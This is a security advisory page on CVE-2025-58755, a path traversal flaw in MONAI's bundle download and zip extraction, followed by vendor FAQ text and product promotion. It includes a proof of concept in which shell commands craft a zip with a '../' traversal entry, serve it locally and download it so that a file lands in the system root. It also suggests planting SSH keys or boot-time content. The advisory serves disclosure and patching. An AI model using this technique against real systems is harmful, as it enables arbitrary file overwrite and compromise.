Summary
The extractall function zip_file.extractall(output_dir) is used directly to process compressed files. It is used in many places in the project. When the Zip file containing malicious content is decompressed, it will overwrite the system files. In addition, the project allows the download of the zip content through the link, which increases the scope of exploitation of this vulnerability.
When reproducing locally, follow the process below to create a malicious zip file and simulate the process of remotely downloading the zip file.
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# mkdir -p test_bundle
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# echo "malicious content" > test_bundle/malicious.txt
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# cd test_bundle
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm/test_bundle# zip -r ../malicious.zip . ../../../../../../etc/passwd
adding: malicious.txt (stored 0%)
adding: ../../../../../../etc/passwd (deflated 64%)
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm/test_bundle# cd ..
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls
malicious.zip p1.py p2.py r1.py test_bundle
Then start the http service through python
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Another terminal simulates a normal user downloading zip content from the Internet, perhaps from some popular forums or blogs, such as huggingface, etc.
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python -c "from monai.bundle.scripts import download; download(name='test_bundle', url='http://localhost:8000/malicious.zip', bundle_dir='/tmp/test_extract')"
2025-08-11 20:49:01,668 - INFO - --- input summary of monai.bundle.scripts.download ---
2025-08-11 20:49:01,668 - INFO - > name: 'test_bundle'
2025-08-11 20:49:01,668 - INFO - > bundle_dir: '/tmp/test_extract'
2025-08-11 20:49:01,668 - INFO - > source: 'monaihosting'
2025-08-11 20:49:01,668 - INFO - > url: 'http://localhost:8000/malicious.zip'
2025-08-11 20:49:01,668 - INFO - > remove_prefix: 'monai_'
2025-08-11 20:49:01,668 - INFO - > progress: True
2025-08-11 20:49:01,668 - INFO - ---
test_bundle.zip: 8.00kB [00:00, 204kB/s]
2025-08-11 20:49:01,710 - INFO - Downloaded: /tmp/test_extract/test_bundle.zip
2025-08-11 20:49:01,710 - INFO - Expected md5 is None, skip md5 check for file /tmp/test_extract/test_bundle.zip.
2025-08-11 20:49:01,710 - INFO - Writing into directory: /tmp/test_extract.
2025-08-11 20:49:01,711 - WARNING - metadata file not found in /tmp/test_extract/test_bundle/configs/metadata.json.
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /
autodl-pub cuda-keyring_1.0-1_all.deb home lib32 **malicious.txt** opt run sys var
bin dev init lib64 media proc sbin tmp
boot etc lib libx32 mnt root srv usr
We can see that malicious.txt was indeed extracted to the root directory, demonstrating that the path traversal successfully wrote the malicious file.
If the Zip file contains SSH keys, malicious content that automatically loads when the user boots the computer, or overwrites legitimate user files, causing services to become inoperable, these actions could cause extremely serious damage.
Repair Suggestions
Check the contents of the downloaded Zip file, or use a safer method to load it
Impact
Arbitrary file write
Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.
CVE-2025-58755 has a CVSS score of 8.8 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.5.1); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2025-58755? CVE-2025-58755 is a high-severity path traversal vulnerability in monai (pip), affecting versions <= 1.5.0. It is fixed in 1.5.1. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
- How severe is CVE-2025-58755? CVE-2025-58755 has a CVSS score of 8.8 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of monai are affected by CVE-2025-58755? monai (pip) versions <= 1.5.0 is affected.
- Is there a fix for CVE-2025-58755? Yes. CVE-2025-58755 is fixed in 1.5.1. Upgrade to this version or later.
- Is CVE-2025-58755 exploitable, and should I be worried? Whether CVE-2025-58755 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2025-58755 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2025-58755? Upgrade
monaito 1.5.1 or later.